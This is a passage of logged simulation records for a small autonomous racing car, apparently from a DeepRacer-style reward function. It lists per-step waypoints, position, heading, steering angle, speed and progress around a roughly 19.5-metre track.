'x': 3.125078911758613, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.955057360318226, 'all_wheels_on_track': True, 'distance_from_center': 0.0030828964229950976, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6096296043067686, 'object_in_camera': False, 'heading': -0.9884467304532386, 'objects_speed': [], 'progress': 0.7773074847674944, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [0, 1], 'track_length': 19.549800178858835, 'steering_angle': 20.0, 'steps': 3.0},
{'is_left_of_center': False, 'projection_distance': 0.16912750229283322, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), (7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), (1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 0.6666666666666666, 'x': 3.1422415816125593, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9542983635625084, 'all_wheels_on_track': True, 'distance_from_center': 0.0037763696438425478, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6096249101529135, 'object_in_camera': False, 'heading': -1.144017253009116, 'objects_speed': [], 'progress': 0.8651111558456122, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [0, 1], 'track_length': 19.549800178858835, 'steering_angle': 9.999999999999998, 'steps': 4.0},
{'is_left_of_center': False, 'projection_distance': 0.20191403063825683, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), (7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), (1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 2.0, 'x': 3.175030705920951, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9531424221266476, 'all_wheels_on_track': True, 'distance_from_center': 0.004816122658064441, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6096159441726402, 'object_in_camera': False, 'heading': -1.274013521940257, 'objects_speed': [], 'progress': 1.0328188973338295, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [1, 2], 'track_length': 19.549800178858835, 'steering_angle': 9.999999999999998, 'steps': 5.0},
{'is_left_of_center': False, 'projection_distance': 0.23782031815517216, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), (7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), (1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 2.0, 'x': 3.2109317593475533, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9509277885376232, 'all_wheels_on_track': True, 'distance_from_center': 0.006944210021401, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6096061250441126, 'object_in_camera': False, 'heading': -1.6277243413174938, 'objects_speed': [], 'progress': 1.216484649353865, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [1, 2], 'track_length': 19.549800178858835, 'steering_angle': 30.0, 'steps': 6.0},
{'is_left_of_center': False, 'projection_distance': 0.3043395330840337, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), (7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), (1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 2.0, 'x': 3.2774576092278784, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.953600119077487, 'all_wheels_on_track': True, 'distance_from_center': 0.00411152612414604, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6095879343380803, 'object_in_camera': False, 'heading': -0.5769436778572566, 'objects_speed': [], 'progress': 1.5567398658792773, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [1, 2], 'track_length': 19.549800178858835, 'steering_angle': 9.999999999999998, 'steps': 7.0},
{'is_left_of_center': True, 'projection_distance': 0.38718280457705984, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), (7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), (1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 1.3333333333333333, 'x': 3.360318239199224, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9607014197320498, 'all_wheels_on_track': True, 'distance_from_center': 0.003189490145353297, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6096016069343125, 'object_in_camera': False, 'heading': 1.1534265481188193, 'objects_speed': [], 'progress': 1.9804949464177108, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [1, 2], 'track_length': 19.549800178858835, 'steering_angle': -10.000000000000004, 'steps': 8.0},
{'is_left_of_center': True, 'projection_distance': 0.4613673129751599, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), (7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), (1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 2.0, 'x': 3.434513541710265, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9682327913973465, 'all_wheels_on_track': True, 'distance_from_center': 0.010850693277073015, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6095861829769621, 'object_in_camera': False, 'heading': 2.4432909721626266, 'objects_speed': [], 'progress': 2.359959225946886, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [2, 3], 'track_length': 19.549800178858835, 'steering_angle': -30.0, 'steps': 9.0},
{'is_left_of_center': True, 'projection_distance': 0.5398379830761915, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), (7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 